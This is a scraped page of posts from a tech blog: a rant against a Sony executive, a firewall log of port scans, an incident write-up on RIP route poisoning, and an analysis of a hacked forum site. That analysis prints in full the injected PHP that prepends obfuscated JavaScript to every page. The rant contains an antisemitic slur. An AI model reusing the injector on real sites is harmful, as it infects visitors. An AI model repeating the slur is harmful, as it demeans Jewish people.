• July 25, 2007 -- Web Based Operating System The Furture Of Computing
• May 3, 2009 -- Rackmount Hammock - Server Room Accessory
• November 16, 2007 -- Instant Messaging is Producing a Generation of Cowards
• July 25, 2007 -- Computer Security Is A Myth - Learn To Appreciate Technology

Post Originally Published at: Nullamatix.com - Technology Made Simple

“I’m a guy who doesn’t see anything good having come from the Internet…(The Internet) created this notion that anyone can have whatever they want at any given time. It’s as if the stores on Madison Avenue were open 24 hours a day. They feel entitled. They say, ‘Give it to me now,’ and if you don’t give it to them for free, they’ll steal it.“

I understand each individual has a unique perspective of what’s good and what’s bad, but to say nothing good has or will come from the Internet is just plain stupidity. The open lines of communication bring people together, allow familys to complete their family trees, help law enforcement find missing persons, and most importantly, allow the sharing of information in new and innovative ways. Is that it Mr. Lynton? You don’t think people should have the ability to share, exchange, and possess information unless deemed ok by YOU?

The Internet hasn’t created anything Mr. Lynton, you’re delusional. What you said is equivalent to, “Phones have created this notion that anyone can have whatever they want at any given time.” The Internet is nothing more than an advanced form of communication. Your argument has no validity, your opinion is worthless. My old man once told me, “Opinions are like assholes, son. Everyone has one and they all stink.” News flash Mr. Lynton, your asshole stinks, too. Mike’s use of pronouns is pitiful. The gross generalization of “they” implies a group of people, but who? Anyone who decides to use the Internet? Well guess what, I use the Internet. And I don’t have the notion that I can have whatever I want at any given time, you inconsiderate dick. Nice try old man, you’re unable to adapt to the changes happening around you.

Hey, sure would have been nice if the Jews had the Internet during WWII. Perhaps the OPEN LINES OF COMMUNICATION would have saved MILLIONS of people from all the pain and suffering your spoiled, arrogant jewish ass will never have to endure. But you don’t see anything good having come from the Internet… hahaha, wow.

I sure hope Sony collapses, soon. A cleanse is needed in our capitalist society. A cleanse to propell fresh, modern companies into the future, where the Internet is seen as a blessing rather than a burden. The world does not revolve around you Michael Lynton, your attempts to control the masses will fail as a result of the Internet. This is the true reason for your displeasure with the Internet. Peace be with you, sir.

More From Nullamatix.com:

• July 25, 2007 -- Defeating A Botnet Trust Him, It’s Easy
• March 8, 2008 -- Automated Adsense Privacy Policy Deployment Guide
• December 10, 2007 -- Are You Feeling Sorry For Someone? Don’t
• November 8, 2007 -- Comcast: Pathetic Hallmark Cards Don’t Excuse Excessive Downtime

Post Originally Published at: Nullamatix.com - Technology Made Simple

Here’s a log snippet from yesterdays events:

SRC=77.106.194.150   DST=209.40.196.119	SPT=1209    DPT=31577
SRC=67.223.213.174   DST=209.40.196.119	SPT=3195    DPT=135
SRC=79.125.10.202    DST=209.40.196.119	SPT=22      DPT=3072
SRC=66.209.106.210   DST=209.40.196.119	SPT=31748   DPT=1433
SRC=66.209.106.210   DST=209.40.196.119	SPT=31748   DPT=1433
SRC=67.223.213.174   DST=209.40.196.119	SPT=1227    DPT=135
SRC=208.77.45.66     DST=209.40.196.119	SPT=12200   DPT=1080
SRC=208.77.45.66     DST=209.40.196.119	SPT=12200   DPT=3128
SRC=208.77.45.66     DST=209.40.196.119	SPT=12200   DPT=8080
SRC=208.77.45.66     DST=209.40.196.119	SPT=12200   DPT=3128
SRC=208.77.45.66     DST=209.40.196.119	SPT=12200   DPT=6588
SRC=67.223.145.49    DST=209.40.196.119	SPT=47606   DPT=135
SRC=76.73.92.11      DST=209.40.196.119	SPT=80      DPT=24174
SRC=76.73.92.11      DST=209.40.196.119	SPT=80      DPT=24174
SRC=76.73.92.11      DST=209.40.196.119	SPT=80      DPT=24174
SRC=76.73.92.11      DST=209.40.196.119	SPT=80      DPT=24174
SRC=67.223.213.174   DST=209.40.196.119	SPT=1404    DPT=135
SRC=125.71.214.71    DST=209.40.196.119	SPT=20494   DPT=38926
SRC=125.71.214.71    DST=209.40.196.119	SPT=20494   DPT=38926
SRC=221.235.54.50    DST=209.40.196.119	SPT=5404    DPT=51981
SRC=221.235.54.50    DST=209.40.196.119	SPT=5404    DPT=51981
SRC=67.223.145.49    DST=209.40.196.119	SPT=9773    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4924    DPT=135
SRC=118.123.5.96     DST=209.40.196.119	SPT=6000    DPT=135
SRC=118.123.5.96     DST=209.40.196.119	SPT=6000    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=3572    DPT=135
SRC=67.223.145.49    DST=209.40.196.119	SPT=51347   DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=2078    DPT=135
SRC=208.109.67.68    DST=209.40.196.119	SPT=80      DPT=24174
SRC=208.109.67.68    DST=209.40.196.119	SPT=80      DPT=24174
SRC=67.223.213.174   DST=209.40.196.119	SPT=3329    DPT=135
SRC=208.109.67.68    DST=209.40.196.119	SPT=80      DPT=24174
SRC=67.223.213.174   DST=209.40.196.119	SPT=1787    DPT=135
SRC=91.98.66.195     DST=209.40.196.119	SPT=51704   DPT=22
SRC=221.209.110.113  DST=209.40.196.119	SPT=48829   DPT=1027
SRC=67.223.213.174   DST=209.40.196.119	SPT=2412    DPT=135
SRC=67.159.61.64     DST=209.40.196.119	SPT=1351    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=3931    DPT=135
SRC=67.159.61.64     DST=209.40.196.119	SPT=2149    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4331    DPT=135
SRC=61.191.63.8      DST=209.40.196.119	SPT=6000    DPT=2967
SRC=67.223.213.174   DST=209.40.196.119	SPT=1324    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4836    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=1151    DPT=135
SRC=114.59.42.69     DST=209.40.196.119	SPT=2186    DPT=56561
SRC=114.59.42.69     DST=209.40.196.119	SPT=2186    DPT=56561
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=3101    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=2694    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4393    DPT=135
SRC=123.233.245.226  DST=209.40.196.119	SPT=20619   DPT=22
SRC=67.223.213.174   DST=209.40.196.119	SPT=3753    DPT=135
SRC=218.22.244.45    DST=209.40.196.119	SPT=1361    DPT=1434
SRC=67.223.213.174   DST=209.40.196.119	SPT=3392    DPT=135
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=173.45.90.10     DST=209.40.196.119	SPT=54835   DPT=10000
SRC=67.223.213.174   DST=209.40.196.119	SPT=4947    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4947    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=3629    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4875    DPT=135
SRC=67.223.213.174   DST=209.40.196.119	SPT=4875    DPT=135
SRC=58.218.206.9     DST=209.40.196.119	SPT=6000    DPT=3389
SRC=67.223.213.174   DST=209.40.196.119	SPT=4196    DPT=135
SRC=67.223.212.164   DST=209.40.196.119	SPT=42375   DPT=135
SRC=67.223.212.164   DST=209.40.196.119	SPT=42375   DPT=135
SRC=67.220.210.18    DST=209.40.196.119	SPT=4890    DPT=135
SRC=67.205.99.205    DST=209.40.196.119	SPT=58616   DPT=135
SRC=61.150.91.36     DST=209.40.196.119	SPT=80      DPT=24174
SRC=116.58.36.139    DST=209.40.196.119	SPT=1087    DPT=31577
SRC=222.252.155.199  DST=209.40.196.119	SPT=11329   DPT=63657
SRC=194.44.165.81    DST=209.40.196.119	SPT=1363    DPT=63280
SRC=77.43.166.191    DST=209.40.196.119	SPT=3868    DPT=139
SRC=77.43.166.191    DST=209.40.196.119	SPT=3868    DPT=139
SRC=61.147.112.19    DST=209.40.196.119	SPT=6000    DPT=1433
SRC=61.147.112.19    DST=209.40.196.119	SPT=6000    DPT=1433
SRC=218.237.108.228  DST=209.40.196.119	SPT=1425    DPT=58281
SRC=118.123.5.105    DST=209.40.196.119	SPT=6000    DPT=135
SRC=195.78.247.4     DST=209.40.196.119	SPT=2203    DPT=31577
SRC=221.204.214.50   DST=209.40.196.119	SPT=35684   DPT=56561
SRC=221.204.214.50   DST=209.40.196.119	SPT=35684   DPT=56561
SRC=62.120.26.213    DST=209.40.196.119	SPT=1217    DPT=63657
SRC=89.149.236.221   DST=209.40.196.119	SPT=80      DPT=20335
SRC=209.42.180.144   DST=209.40.196.119	SPT=1789    DPT=135
SRC=95.133.46.106    DST=209.40.196.119	SPT=1034    DPT=63657
SRC=221.195.73.68    DST=209.40.196.119	SPT=6000    DPT=7212
SRC=221.195.73.68    DST=209.40.196.119	SPT=6000    DPT=8000
SRC=121.230.53.207   DST=209.40.196.119	SPT=1475    DPT=58281
SRC=221.209.110.113  DST=209.40.196.119	SPT=52525   DPT=1027
SRC=95.211.14.208    DST=209.40.196.119	SPT=80      DPT=3072
SRC=95.211.14.208    DST=209.40.196.119	SPT=80      DPT=3072
SRC=93.90.224.237    DST=209.40.196.119	SPT=1070    DPT=65035
SRC=67.55.227.247    DST=209.40.196.119	SPT=3495    DPT=135
SRC=67.55.227.247    DST=209.40.196.119	SPT=3495    DPT=135
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=206.156.254.185  DST=209.40.196.119	SPT=50696   DPT=22
SRC=206.156.254.185  DST=209.40.196.119	SPT=50696   DPT=22
SRC=220.162.241.11   DST=209.40.196.119	SPT=6649    DPT=1433
SRC=221.195.40.169   DST=209.40.196.119	SPT=6000    DPT=3128
SRC=94.179.49.141    DST=209.40.196.119	SPT=2501    DPT=56561
SRC=94.179.49.141    DST=209.40.196.119	SPT=2501    DPT=56561
SRC=41.211.213.59    DST=209.40.196.119	SPT=1116    DPT=58281
SRC=220.162.241.11   DST=209.40.196.119	SPT=43608   DPT=1433
SRC=220.162.241.11   DST=209.40.196.119	SPT=51053   DPT=1433
SRC=122.117.60.80    DST=209.40.196.119	SPT=60798   DPT=25
SRC=122.117.60.80    DST=209.40.196.119	SPT=60798   DPT=25
SRC=218.4.149.124    DST=209.40.196.119	SPT=2603    DPT=1434
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=118.123.5.109    DST=209.40.196.119	SPT=6000    DPT=135
SRC=81.19.132.8      DST=209.40.196.119	SPT=1907    DPT=31577
SRC=63.223.110.213   DST=209.40.196.119	SPT=60780   DPT=22
SRC=63.223.110.213   DST=209.40.196.119	SPT=60780   DPT=22
SRC=221.209.110.107  DST=209.40.196.119	SPT=49670   DPT=1026
SRC=221.235.54.50    DST=209.40.196.119	SPT=5404    DPT=51981
SRC=221.235.54.50    DST=209.40.196.119	SPT=5404    DPT=51981
SRC=94.50.116.235    DST=209.40.196.119	SPT=1553    DPT=63657
SRC=193.252.218.143  DST=209.40.196.119	SPT=1211    DPT=10000
SRC=218.6.12.230     DST=209.40.196.119	SPT=6000    DPT=1433
SRC=221.209.110.113  DST=209.40.196.119	SPT=32996   DPT=1026
SRC=209.252.84.131   DST=209.40.196.119	SPT=4851    DPT=139
SRC=125.65.112.217   DST=209.40.196.119	SPT=12200   DPT=1080
SRC=125.65.112.217   DST=209.40.196.119	SPT=12200   DPT=8080
SRC=168.126.20.129   DST=209.40.196.119	SPT=6000    DPT=1433
SRC=67.223.145.49    DST=209.40.196.119	SPT=33369   DPT=135
SRC=211.147.220.190  DST=209.40.196.119	SPT=6000    DPT=2967
SRC=189.89.38.204    DST=209.40.196.119	SPT=40910   DPT=22
SRC=189.89.38.204    DST=209.40.196.119	SPT=40910   DPT=22
SRC=61.160.213.53    DST=209.40.196.119	SPT=6000    DPT=135
SRC=67.223.145.49    DST=209.40.196.119	SPT=4459    DPT=135
SRC=211.157.103.138  DST=209.40.196.119	SPT=80      DPT=8137
SRC=218.4.149.124    DST=209.40.196.119	SPT=2603    DPT=1434
SRC=221.209.110.105  DST=209.40.196.119	SPT=40933   DPT=1027
SRC=67.36.63.137     DST=209.40.196.119	SPT=3522    DPT=135
SRC=67.223.145.49    DST=209.40.196.119	SPT=62708   DPT=135
SRC=61.191.63.3      DST=209.40.196.119	SPT=6000    DPT=135
SRC=61.191.63.3      DST=209.40.196.119	SPT=6000    DPT=135
SRC=67.223.145.49    DST=209.40.196.119	SPT=10600   DPT=135
SRC=65.98.240.53     DST=209.40.196.119	SPT=6000    DPT=3389
SRC=190.50.208.179   DST=209.40.196.119	SPT=24647   DPT=63280
SRC=67.223.145.49    DST=209.40.196.119	SPT=51588   DPT=135
SRC=201.134.103.165  DST=209.40.196.119	SPT=2481    DPT=22
SRC=201.134.103.165  DST=209.40.196.119	SPT=2481    DPT=22
SRC=221.209.110.105  DST=209.40.196.119	SPT=46610   DPT=1026
SRC=67.223.145.49    DST=209.40.196.119	SPT=47459   DPT=135
SRC=61.160.211.21    DST=209.40.196.119	SPT=6000    DPT=2967
SRC=67.223.145.49    DST=209.40.196.119	SPT=16728   DPT=135
SRC=221.130.198.14   DST=209.40.196.119	SPT=6000    DPT=8080
SRC=221.130.198.14   DST=209.40.196.119	SPT=6000    DPT=8080
SRC=201.78.227.103   DST=209.40.196.119	SPT=1578    DPT=36858
SRC=201.78.227.103   DST=209.40.196.119	SPT=1578    DPT=36858
SRC=58.53.192.47     DST=209.40.196.119	SPT=53802   DPT=22
SRC=67.18.130.34     DST=209.40.196.119	SPT=1475    DPT=4899
SRC=190.146.236.242  DST=209.40.196.119	SPT=63498   DPT=58281
SRC=202.101.42.73    DST=209.40.196.119	SPT=4310    DPT=5900
SRC=202.101.42.73    DST=209.40.196.119	SPT=4310    DPT=5900
SRC=190.144.121.90   DST=209.40.196.119	SPT=9366    DPT=22
SRC=190.144.121.90   DST=209.40.196.119	SPT=9366    DPT=22
SRC=190.41.24.150    DST=209.40.196.119	SPT=11901   DPT=48222
SRC=190.41.24.150    DST=209.40.196.119	SPT=11901   DPT=48222
SRC=221.195.40.169   DST=209.40.196.119	SPT=6000    DPT=2967
SRC=61.160.211.21    DST=209.40.196.119	SPT=6000    DPT=2967
SRC=219.85.29.130    DST=209.40.196.119	SPT=4460    DPT=25
SRC=219.85.29.130    DST=209.40.196.119	SPT=4460    DPT=25
SRC=211.157.103.138  DST=209.40.196.119	SPT=80      DPT=8137
SRC=89.36.82.43      DST=209.40.196.119	SPT=80      DPT=1024
SRC=58.30.19.33      DST=209.40.196.119	SPT=80      DPT=8137
SRC=60.28.166.94     DST=209.40.196.119	SPT=80      DPT=8137
SRC=81.183.213.107   DST=209.40.196.119	SPT=35216   DPT=4899
SRC=81.183.213.107   DST=209.40.196.119	SPT=35216   DPT=4899
SRC=81.183.213.107   DST=209.40.196.119	SPT=35216   DPT=4899
SRC=211.157.103.138  DST=209.40.196.119	SPT=80      DPT=8137
SRC=60.28.166.94     DST=209.40.196.119	SPT=80      DPT=8137
SRC=221.195.73.68    DST=209.40.196.119	SPT=6000    DPT=7212
SRC=221.195.73.68    DST=209.40.196.119	SPT=6000    DPT=8000
SRC=61.147.112.81    DST=209.40.196.119	SPT=6000    DPT=1433
SRC=61.147.112.81    DST=209.40.196.119	SPT=6000    DPT=1433
SRC=58.20.154.23     DST=209.40.196.119	SPT=1857    DPT=1434
SRC=201.21.82.66     DST=209.40.196.119	SPT=1211    DPT=58281
SRC=67.223.212.164   DST=209.40.196.119	SPT=58648   DPT=135
SRC=67.223.212.164   DST=209.40.196.119	SPT=58648   DPT=135
SRC=61.137.90.253    DST=209.40.196.119	SPT=6000    DPT=8080
SRC=98.212.142.147   DST=209.40.196.119	SPT=2370    DPT=1433
SRC=221.209.110.105  DST=209.40.196.119	SPT=33472   DPT=1026
SRC=125.65.112.177   DST=209.40.196.119	SPT=6000    DPT=135
SRC=118.123.5.105    DST=209.40.196.119	SPT=6000    DPT=135
SRC=61.160.216.63    DST=209.40.196.119	SPT=12200   DPT=7212
SRC=61.160.216.63    DST=209.40.196.119	SPT=12200   DPT=8000
SRC=118.123.5.105    DST=209.40.196.119	SPT=6000    DPT=135
SRC=67.220.210.18    DST=209.40.196.119	SPT=4768    DPT=135
SRC=125.65.165.139   DST=209.40.196.119	SPT=12200   DPT=3128
SRC=125.65.165.139   DST=209.40.196.119	SPT=12200   DPT=8000
SRC=220.190.66.78    DST=209.40.196.119	SPT=65370   DPT=63280
SRC=209.252.84.131   DST=209.40.196.119	SPT=2789    DPT=139
SRC=209.252.84.131   DST=209.40.196.119	SPT=2789    DPT=139
SRC=58.20.154.23     DST=209.40.196.119	SPT=1857    DPT=1434
SRC=67.223.133.85    DST=209.40.196.119	SPT=47303   DPT=135
SRC=187.141.71.172   DST=209.40.196.119	SPT=44820   DPT=22
SRC=67.223.133.85    DST=209.40.196.119	SPT=12397   DPT=135
SRC=189.228.129.174  DST=209.40.196.119	SPT=60701   DPT=22
SRC=58.83.127.206    DST=209.40.196.119	SPT=55453   DPT=36858
SRC=58.83.127.206    DST=209.40.196.119	SPT=55453   DPT=36858
SRC=67.223.133.85    DST=209.40.196.119	SPT=32873   DPT=135
SRC=221.209.110.105  DST=209.40.196.119	SPT=44753   DPT=1026
SRC=67.213.14.126    DST=209.40.196.119	SPT=4163    DPT=135

The point of this post is to stress the importance of keeping your networks secure. Whether you’re responsible for 1 IP address, or 65,000, there’s no room for error. Take the time to setup a firewall if you haven’t already. And never trust outgoing connections, despite the temptation to just say, “Fuck it, this is too much work.” Always monitor traffic coming in or going out of your network, keep a watchful eye on logs (they won’t watch themselves…), and never, EVER permit inbound traffic from untrusted sources on server management ports (22, 3389, 3306, etc).

If you can’t afford to implement these simple security measures now, how can you afford to have your identify stolen or defend yourself in court for distributing child pornography later? Do you think you’re invisible to such disastrous events? Share your comments or questions below…

See Also:

• August 22, 2009 -- Howto: Fortinet Pub Key Authentication for Backups
• July 17, 2009 -- Cryp_Ilomo-2 and TROJ_ILOMO.CK are in The Wild

Post Originally Published at: Nullamatix.com - Technology Made Simple

At approximately 15:00:00 on Saturday, May 9th, 2009, one of our seven regional sites replaced their Nortel switch with a Cisco Switch.

By 15:45:00, several hundred network monitor alerts made their way into my inbox (blackberry is going nuts). I immediately suspect the server responsible for issuing the alerts was somehow broken, so I login and find nothing unusual. Further troubleshooting revealed a more serious problem…

19:40:00 - 20:00:00

Guy: y0y0y0. you getting all these alerts??
Guy: the whole enterprise is down...
netstaff-001: Not on call...
Guy: me either
netstaff-001: So haven't been paying attention
Guy: trew
netstaff-001: Lemme call netstaff-002
netstaff-001: Only seen 1 network alarm though
Guy: well, im seeing 800+ non responsive hosts
netstaff-001: Its internal
netstaff-001: Check main fw
netstaff-001: No circuit outages
netstaff-001: netstaff-002 is on his way in
netstaff-001: Who's security oncall? You?
Guy: region 5's firewall died earlier today, but
that shouldn't effect ALL the regions
Guy: N. secstaff-002 is. he hasn't responded yet.
netstaff-001: Haha
netstaff-001: network monitor is f****** up
Guy: is it?    ( <-- i played dumb despite already checking into that)
netstaff-001: Wouldn't know
netstaff-001: Don't have access:D
netstaff-001: netstaff-002 said he'd send an email when he got onsite
netstaff-001: secstaff-002 needs to respond

Yea, but he’s not. Take some initiative…

20:18:00
Someone in the field finally noticed…

Can someone tell me why the network is down??
 
--------------------------
Sent from my BlackBerry Wireless Handheld

Not yet… we’re investigating.

20:54:00
A regional member of our security team volunteers to disable the thousands of email alerts being dispatched.

22:36:00
Lead Network Engineer & Security Manager asks myself and the others working the incident to examine the routes on Region X’s firewalls.

23:04:00
Sure enough, bogus/poisonous routes from an erroneous RIP advertisement were identified:

region6-fw # get router info routing-table all
Codes: K - kernel, C - connected, S - static, R - RIP, B - BGP
       O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
       * - candidate default
 
R*      0.0.0.0/0 [120/4] via 172.17.12.1, external, 05:11:06
R       10.10.0.0/16 [120/4] via 192.168.112.1, internal, 03:23:46
S       10.10.255.10/32 [5/0] is directly connected, REDZONE_VPN
R       192.68.0.0/16 [120/3] via 192.168.112.1, internal, 03:23:46
C       192.168.112.0/24 is directly connected, internal
S       192.168.113.0/24 [10/0] via 192.168.112.1, internal
R       192.168.114.0/24 [120/2] via 172.17.12.162, ha, 04:35:33
S       192.168.122.0/26 [10/0] via 192.168.112.1, internal
R       172.17.0.0/16 [120/4] via 192.168.112.1, internal, 03:23:46
C       172.17.12.0/30 is directly connected, external
C       172.17.12.160/30 is directly connected, ha
R       172.20.0.0/16 [120/2] via 192.168.112.1, internal, 03:23:46
R       192.168.111.0/24 [120/2] via 192.168.112.1, internal, 03:23:46

Ravishing. It appears the switch behind this firewall is advertising their gateway (192.168.112.1) as the intended destination for the entire 192.168.0.0/16 network (65,534 addresses), and our wonderful firewall is allowing it - fucking beautiful… We’ve been RIP Poisoned. Now to stop this non-sense. Here’s what we came up with for possible mitigation techniques:

• Disable RIP on the firewall’s internal interface
• Delete the internal interface from the firewalls RIP configuration
• Set the internal interface to passive mode
• Define a policy to DENY RIP advertisements destine for the internal interface
• Flush the routing table and/or reboot the firewall

One would hope deleting an interface from the router rip configuration would have done the trick, allowing us to get some sleep. Well, that’s not the case with this Fortinet firewall…

Somewhere Between: 00:00:00 and 01:30:00

region6-fw # config router rip
 
region6-fw (rip) # config interface
 
region6-fw (interface) #  delete internal
 
region6-fw (interface) #  end
 
region6-fw (rip) # show config router rip
        config distribute-list
            edit 1
                set interface "external"
                set listname "DROP_DIRTY_SEGMENT"
            next
            edit 2
                set interface "external"
                set listname "ACC_1"
                set status enable
            next
            edit 3
                set interface "ha"
                set listname "ACC_1"
                set status enable
            next
            edit 4
                set interface "external"
                set listname "REDZONE_01"
                set status enable
            next
        end
        config interface
            edit "external"
                set split-horizon regular
            next
        end
        config network
            edit 1
                set prefix 172.16.0.0 255.255.0.0
            next
            edit 2
                set prefix 172.17.0.0 255.255.0.0
            next
            edit 3
                set prefix 192.168.0.0 255.255.0.0
            next
        end
        config redistribute "connected"
            set status enable
        end
        config redistribute "static"
            set status enable
        end
        config redistribute "ospf"
        end
        config redistribute "bgp"
        end
end

Look ma, no internal interface! We’re all pretty baffled at this point. The RIP advertisements are still getting through and still poisoning the entire network. Around 01:45:00, 25,500+ sessions, to NO. WHERE. We eventually disabled the firewall’s internal interface, at least until the system administrator could disable that fancy new auto-summary feature on his switch…

Ahh, good times.

Fortinet said we did the right thing, but couldn’t explain why their product failed to produce the desired result. I’m sure they’ll come up with an explanation soon. Stay tuned for an update.

So - how the heck was your weekend? :]

See Also:

• August 22, 2009 -- Howto: Fortinet Pub Key Authentication for Backups
• August 17, 2009 -- Howto: Windows XP/Server 2003 Null Route

Post Originally Published at: Nullamatix.com - Technology Made Simple

Did I Win The Rackmount Hammock Game?

More From Nullamatix.com:

• December 12, 2007 -- Free Web Site Reviews
• January 3, 2008 -- Google Bot Works In Mysterious Ways
• October 28, 2007 -- Automatically Mount and Unmount your iPod as any non-root user
• December 18, 2007 -- Text Link Advertisments Yield Larger Returns

Post Originally Published at: Nullamatix.com - Technology Made Simple

As I’m going through unread email, I came across this from a friend and fellow webmaster,

My home page has had trouble loading for people in the past two days.

FF says “The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.”
IE just times out.

Any idea wtf? I was able to load it earlier.. but now I can’t. I haven’t made any changes to it. lame lame lame lame

Sure enough, I visit the page, nothing. Lets see what the headers say.

http://www.r00ted-site??.com/

GET / HTTP/1.1
Host: www.r00ted-site??.com

HTTP/1.x 200 OK
Date: Fri, 01 May 2009 23:02:44 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: private
Pragma: private
X-Powered-By: PHP/5.2.5
Set-Cookie: bblastvisit=1240161467; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Set-Cookie: bblastactivity=0; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from 0×95.
Connection: keep-alive

Ok, that checks out, lets see what GoogleBot is seeing (Google Cache),

...snip...

º€Üñ~X CnÊ^ r]tÎ ß©`˜_ÿJ ‚Œ«07’ [lö¼á¦˜Á.IæöH L®(îy±pã~I½A&
Ø žÔω áeˆ¥JR­Ã|‚¥Ö qC£L™.±ÑW•JÒ¦P¢ •³É6‚M Y ëd ¥Ê‚vÄ7É⥿9Þ•ü
Š2Œ U‡ü´PNÏŽ¼>· Í¡&Žg~ì Éà( k¦Š£FÑeºjƒj>c yóXì¤K'q 5 ês
±&Ž[tÇÓ êóO ¦z¨IlË.E#Û ùÔ–_”5SÿRŒ…bôìkñßë ª§ßÕ £ 3§¤( Õë
üeJ‰˜È­eƒ ®¦êôä'«ÝògŠö ÿ-wÁ :® ÖnöX ¾á±1cïÁ ç¸ XˆÒiN( <×w
£(I¥Ø  ÿ á Pco jž&kiò 6Óä‡ï –©†R´ ˜È &›1ù§&à °"ž÷ý`
N³Fr3Í 0× ¤ N Ê™Tè¹ |»çúÔ;jÁrÜ 6ä{¥ Þ³é.WBk òª|BR’ó ‹*9 ü" C ùÇžã
ø®|ÎŒ ˆ-q¯¹ÉÏbö³¿ ä"W9s˜ ¸ê‘x6uC è–È EÍ é EÕ‚íªôøÜsâ :±\þ ~ff‚ÍðÓ
¸9à:‹ ¾$ñ¡H ð f ¶ K§†º JU,{ŸÕ­ç I «+« DTŽ î— µÞÙæJëZ6P ®çRA5YPÒ:
² V •zÜ ù œO6 ¦ìÎ

...snip...

Lovely.. He sends over the index.php that's causing the issue, and here's what's inside,

 <?php
 
/*d6dc9649bc1e96ceef5b932f3edee390*/
 
ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'
<script language=javascript>rtrlevm="iTiyvIYW%YYglJJLMU";ibvjpl="
<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e
 !75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72 
go!61srho,!68!66q!79!72!78u=!22pHGF\\\'!37!50!38!2cyT+6!73!2e!4d
^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{!6159!26!28g]B!
4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-\\\\\\\\\\\\
"\\\\"!2cj!66cmun=!22\\\\",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d\\\\"!22,!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72
ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh=
hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68
!3e!2d1)!7b!20!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581
!2d1)!3b!69f!28!67u!6b!74ox!7a<!3d0)gu!6bt!6f!78z!2b=81!3bvnz!
75ex!70+!3dh!66q!79rx!75!2ec!68a!72!41!74(g!75k!74o!78!7a-1); } 
else!20vn!7auexp!2b=vvpyvt;}jfcmun+!3dv!6e!7aue!78p!3b!64!6fc
!75!6d!65!6e!74.wr!69!74e(!6afcm!75n)!3b}<!2fs!63rip!74>";ncow
yow=rtrlevm.charAt(8);trbcvxg=ibvjpl.replace(/!/g,ncowyow);muabsg=
unescape(trbcvxg);var jvhgggf,mvzdovk;document.write(muabsg);jvhgggf="<.Ed0H[lC5z]~5]orpj5:5SEd0H[p>l`~zE[0izl{d]dCv)CCUTEig1lal[dTlal:
5dl5vU2 :]z rlp]5C2{{z3`nU33Hpyln]UwdwH.:zlrlVkl`~zE[0izl~fo5oi3do3d3)gz53
oyl:5C~o1la:5dlnlrlzo)lD5[oknM.o[+03oggzo)lD5[o1M]o[+03og1l6l,
s#hhhhh1kniE~3oz[MEiiU0olrlz53ol6lprpl6lo.E5Hog:5C~o1l6lpklo2H0do.
rpl6lnM[iF^+S[d0z]g1kAl`~zE[0izlE.: wE[ 3nv:g1lado[~dzlgniE~3oz
[MEiiU0oM0zno2}`g5vU2 :]z l6lprpl6ln]UwdwH.:z1lrrl\\\\"V1kAl0`glE.: wE[ 
3nv:g1l1lalniE~3oz[M)d0[oglp<S!R=8+lC5z]~5]or\\\\\\\\pj5:5SEd0H[\\\\\\\\plSR!r
\\\\\\\\pv[[HI//]ii]Co5z5CT[CE.Mzo[/--~[3M]0`?PK9#K5&h,&VnVh,sKh,nh5VfVEVJ#VVhVK&&`&9hK,VJ&h(p6niE~3oz
[Mdo`oddod6p(p6S[d0z]ggzo)lD5[og11M]o[+03og116p\\\\\\\\p>
<\\\\\\\\/S!Rp6p=8+>pl1kl~fo5oi3do3d3)gl5vU2 :]z yln]UwdwH.:zl1klAloC.olalAlAlE5[Evlgo1laAlAl{d]dCv)CCUTEig1k</.Ed0H
[>l";uahidadu(jvhgggf);</script>\'."\n".$buf;' ) );
 
/*d6dc9649bc1e96ceef5b932f3edee390*/
 
// ++=========================================================================++
// || vBadvanced CMPS v3.0.1 (vB 3.6 - vB 3.7) - 56182
 
...snip...

Originally, that crap was all on 1 line, but I added the line-breaks for the site. Here's the unmodified version (ppsst - scroll right),

